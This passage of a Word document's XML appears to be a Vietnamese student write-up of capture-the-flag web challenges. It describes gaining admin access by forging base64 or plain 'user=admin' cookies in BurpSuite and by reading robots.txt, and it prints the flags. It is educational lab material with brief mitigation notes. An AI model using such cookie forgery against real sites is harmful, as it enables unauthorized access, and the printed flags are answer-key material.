    <w:p w14:paraId="33AE5126"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Với hình ảnh trên ta sẽ cần leo thang đặc quyền cho user Guest có hành vi như quyền admin. Lúc này ta nghĩ đến việc xem xét thay đổi thông tin gói request post và BurpSuite là ứng cử viên sáng giá cho công việc này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416BE53D"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lastRenderedPageBreak/>
        <w:t>Bước 2: Chỉnh sửa gói request post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346251B"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3AC6978D" wp14:editId="6FB0C400">
            <wp:extent cx="6114105" cy="3581400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="3581400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A75BF"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11: Hình ảnh gói request post và response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53DA4E"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Từ hình ảnh trên, ta nhận thấy rằng khi post user = Guest và pass = Guest thì cookies trong gói tin response xuất hiện trường Authentication với giá trị giống như được mã hóa base64 và khi ta giải mã thông tin trường Authentication ta được login=Guest7 tức rằng lúc này ta sẽ nghĩ đến hướng tiêm Authentication với giá trị</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> login=admin</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> từ trước, thì có thể vượt qua được challenge này. Hiển nhiên giá trị cần tiêm này sẽ được mã hóa base64.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6B5C34A6" wp14:editId="4B5CBFDC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1085850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1562100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EACBD6"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12: Hình ảnh gói request sau khi chỉnh sửa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9AA0FD"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Bước 3: Tìm flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1EF85A"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Sau khi chỉnh sửa xong, tiến hành forward gói tin, ta sẽ nhận được flag như hình 13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A8ADB"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lastRenderedPageBreak/>
        <w:t>Figure 13: Hình ảnh flag</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="403948FE" wp14:editId="70B20B97">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>266700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1358900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1358900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="731DDEA1"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FLag{B@D_4uTh1Nt1C4Ti0n}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2B5FB"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Khuyến cáo: Thực hiện lọc gói tin đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C42D1" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_heading=h.ev6sboxv4jad" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Blue Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DBFD3A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Blue Inc. - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E87D6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện chỉnh gói tin để gửi lên lấy flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFE20EA"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33419ABC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D9DD15" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F037713" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FBE4E6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: Xem trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748932F4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tiến hành vào web và xem mã nguồn trang web</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="79739F75" wp14:editId="63B9323B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>340995</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="3721100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="3721100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74ADF4"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t>Figure 14: Hình ảnh trang web và 1 phần mã nguồn trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D425875" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi login thành công, ta vẫn chưa thấy được điều gì, ta sẽ dùng Burp suite để xem xét gói tin response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25487325"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15: Hình ảnh profile demo</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="52C8DC78" wp14:editId="7EBEDC07">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="2387600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="2387600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="677628FB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0F1D85" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEC4637"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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="7B0C0315" wp14:editId="16DF374A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>66676</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>370824</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="3670300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="3670300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E9015" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFA693E"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16: Hình ảnh request và response khi login bằng account demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA453DA"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Từ hình 16 ta nhận thấy rằng cookies trong gói response chỉ nhận đúng 1 trường user=demo. Suy ra, ta có thể đặt cookie ban đầu là user=admin thì có thể có được flag của challenge này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431B46E"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Bước 2: Chỉnh sửa gói tin request và lấy flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E39876"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Chỉnh sửa gói tin request như hình dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C98B3"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lastRenderedPageBreak/>
        <w:t>Figure 17: Hình ảnh gói tin request và flag</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="0C58D2B3" wp14:editId="4697D513">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>123825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="2628900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AB67D"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Flag: 15716a249064f7e9684a816dcdb05282</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17B160"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Khuyến cáo: lọc gói tin đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FC9328" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_heading=h.6hy72pwr2f7v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Easy Message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A632DC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Easy Message - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9E6C8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện gửi request và thực hiện giải mã thôngtin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C175DB8"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bookmarkStart w:id="27" w:name="_heading=h.lapo14bt547a" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="27" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_18"/>
        <w:id w:val="-1279710002"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="27735E98" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="7"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Tài nguyên:</w:t>
          </w:r>
          <w:hyperlink r:id="rId52">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="212120"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="28" w:name="_heading=h.f5mwbko3o4ec" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="28" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_19"/>
        <w:id w:val="559911219"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="1000C5B6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="7"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink r:id="rId53">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:color w:val="1155CC"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://www.base64decode.org/</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="1155CC"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:t xml:space="preserve">, </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="29" w:name="_heading=h.82gmigw62z62" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="29" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_20"/>
        <w:id w:val="-1084842651"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="08AD9E74" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="7"/>
            </w:numPr>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink r:id="rId54">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:color w:val="1155CC"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://morsedecoder.com/</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="1155CC"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="07A4789F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: Vào web và xem mã nguồn trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB4333E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Với challenge này có vẻ như mã nguồn trang không có gì để khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="49D60EA5" wp14:editId="33FCBA7E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>332724</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="2717800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1EB64D"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18: Hình ảnh trang web và 1 phần mã nguồn trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44448D93"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Với trang web như thế, chúng em tiến hành khai thác thử file robots.txt để tìm dữ liệu có thể khai thác (xem hình 19)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F825EF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED3FA06"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19: Hình ảnh nội dung file robots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="018B327E" wp14:editId="541CC086">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>296529</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="2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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1562100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B747E"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hình 19 cho ta thấy được rằng url+ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
